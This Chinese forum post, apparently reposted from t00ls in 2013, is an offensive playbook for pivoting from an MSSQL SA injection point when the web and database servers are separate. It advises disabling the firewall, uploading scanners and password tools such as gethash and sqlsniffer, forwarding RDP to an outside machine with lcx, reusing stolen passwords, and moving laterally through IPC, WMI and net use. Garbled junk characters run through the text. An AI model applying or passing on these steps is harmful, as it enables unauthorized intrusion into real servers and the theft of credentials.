当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。) H0 }, i! \% j0 ]
: W- b8 j* Q5 {8 E+ l
4 y1 d8 `( T4 t/ s( O, }9 [
/ X; p# I$ Q$ [ D0 jSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出), S" y5 B! z& B# i1 J: K
: V% d# F9 A8 Q+ d
1 K# {$ c: y3 ^一、DB机有公网IP.7 F" r; z# L9 {* `/ N2 h
5 ^. `7 z. h6 _1 U l C
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
9 d" `9 _ `: u% z
% \8 w S! u( `- Z8 u, {$ G, M" G" T P4 ]4 |7 h: Q, f
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
* ?, E7 k0 J4 E5 B6 u! l' g7 v; z0 b
5 o9 f6 \+ A7 t9 J# e5 j+ i* Y+ L+ c
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com2 k5 p3 a, s+ `$ B
/ S' h# x" E. y# u" C/ q! h3 {
* c- `0 w9 g# s5 D2 w9 X0 }4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.: x1 ]" q6 g% B0 ?9 U4 H; u
. A' y. K3 {, i u6 p
. T4 H5 u1 y" T( G& J$ n
4 c, i% ?! r* g2 `二、DB机只有内网IP7 A) y+ h8 ?# f% l: X
" [$ V9 C8 z) X
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
$ l6 \: n. ?1 v0 y5 l& C" V8 l( x$ S( E+ d( V9 K* I* F
0 z6 B4 a% @+ {2 b2:停掉防火墙和IP策略再从内往外扫描.2 Y" o) V9 T4 `' b d
2 A' u) O% \3 H- b
5 c6 E. y- `2 Y& u" |& X3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.6 L8 B. B$ c$ p) K; F& w, |4 N2 m
5 p/ g0 l* F; @/ W2 F8 x% Y3 B1 R% j7 H
4:学会密码规律分析往往会有惊喜.
% d, Q) D. u; {6 e+ s/ ^) G
K& B% K) ]# t) f) ^9 g2 k+ Y
4 E9 V3 u0 i" o" \5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
0 ^3 H ^# n+ z' c6 R& w1 L0 B& D
. S8 _% j' H2 M9 s, k& G1 k
+ j' w# a7 v. } O' U有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对